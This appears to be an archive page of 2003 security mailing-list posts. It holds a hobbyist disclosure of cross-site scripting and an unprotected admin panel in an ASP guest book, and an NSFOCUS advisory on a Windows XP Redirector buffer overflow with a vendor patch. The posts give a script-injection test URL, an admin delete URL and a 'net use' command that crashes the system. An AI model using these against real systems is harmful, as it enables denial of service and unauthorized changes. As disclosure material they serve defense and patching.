Trustix Security Team

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE+gbc7wRTcg4BxxS0RAn+QAJ9HvzQtVSnGsbVCFX23rMEEnYj0wQCdEOEQ
wRu/zKQwFMp6EFanSEk1R6k=
=OHgX
-END PGP SIGNATURE-

Vulnerability in my guest book

[Over_G]

Product: My guest book
Version: ?
OffSite: ?
Problem: CSS and unauthorized access in admin panel
--

1)Cross Site scripting

http://[target]/myguestBk/add1.asp?name=Name&subject=Subj&[EMAIL 
PROTECTED]&message=alert ("Test!")

Or open http://[target]/myguestBk/add.asp and write in "Message" field: 
alert ("Test!") and press "Post Message".


2)Unauthorized access in admin panel

http://[target]/myguestBk/admin/index.asp
Delete news:
http://[target]/myguestBk/admin/delEnt.asp?id=NEWSNUMBER
with NEWSNUMBER - news number in database.




Contacts: www.overg.com www.dwcgr0up.com
irc.zaingandol.org #DWC
[EMAIL PROTECTED]


Best regards, Over G[DWC Gr0up]

NSFOCUS SA2003-01: Microsoft Windows XP Redirector Local Buffer Overflow Vulnerability

[NSFCOSU Security Team]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

NSFOCUS Security Advisory(SA2003-01)

Topic: Microsoft Windows XP Redirector Local Buffer Overflow Vulnerability

Release Date: 2003-3-27

CVE CAN ID: CAN-2003-0004

Affected system:
===

- - Microsoft Windows XP
- - Microsoft Windows XP SP1

Summary:
=

NSFOCUS Security Team has found a buffer overflow vulnerability in Microsoft
Windows XP Redirector. Exploiting the vulnerability local attackers
could crash the system or gain local system privilege by carefully crafted
code.

Description:


The Windows Redirector is used to access files, whether local or remote.It
is used to access network shares by net use command.

A security vulnerability exists in the Windows Redirector on Windows XP.An
unchecked length in handling the received parameter information causes a
buffer overflow vulnerability. Exploiting the vulnerability a non-privileged
user could cause system blue screen and reboot. If the code was carefully
crafted, attackers could execute arbitrary command in system privilege. At
present no remote exploitation method has been found.

Only Windows XP is vulnerable to the issue. Windows NT 4.0, Windows NT 4.0
Terminal Server Edition, and Windows 2000 do not contain the vulnerable code
and are not affected by this vulnerability.

Exploit:
==

Enter the following command as a non-privileged user in the command line
window:

c:\> net use \\...AAA[about 1000-2000 'A' characters]\A

Windows XP will become blue screen or reboot immediately.

Note: Attackers have to be able to login interactively.

Workaround:
=

 Prohibit untrusted user login to your system.

Vendor Status:
==

Microsoft has issued a Security Bulletin(MS03-005) and the related patch.

Detailed Microsoft Security Bulletin is available at:

http://www.microsoft.com/technet/security/bulletin/ms03-005.asp

Patches are available at:

. Microsoft Windows XP 32-bit Edition:
http://microsoft.com/downloads/details.aspx?FamilyId=33DABD1F-505E-48ED-B9BD-CDAC0F8A2BC1

. Microsoft Windows XP 64-bit Edition:
http://microsoft.com/downloads/details.aspx?FamilyId=A2258F4E-9A69-4537-9469-0DDEB4BB76F8

Additional Information:


The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2003-0004 to this issue. This is a candidate for inclusion in the
CVE list (http://cve.mitre.org), which standardizes names for security
problems. Candidates may change significantly before they become official
CVE entries.

DISCLAIMS:
==
THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT WARRANTY
OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED,
EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENTSHALL NSFOCUS
BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
INCIDENTAL,CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES,
EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
DISTRIBUTION OR REPRODUCTION OF THE INFORMATION IS PROVIDED THAT THE
ADVISORY IS NOT MODIFIED IN ANY WAY.

Copyright 1999-2003 NSFOCUS. All Rights Reserved. Terms of use.


NSFOCUS Security Team <[EMAIL PROTECTED]>
NSFOCUS INFORMATION TECHNOLOGY CO.,LTD
(http://www.nsfocus.com)

PGP Key: http://www.nsfocus.com/homepage/research/pgpkey.asc
Key fingerprint = F8F2 F5D1 EF74 E08C 02FE  1B90 D7BF 7877 C6A6 F6DA
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.0.7 (GNU/Linux)

iD8DBQE+gqok1794d8am9toRApqxAJwMtZqaVys339PPHkRjUcvmLkh5fgCePqE0
q704B7gafnFoyZW+4w3auwI=
=wAjk
-END PGP SIGNATURE-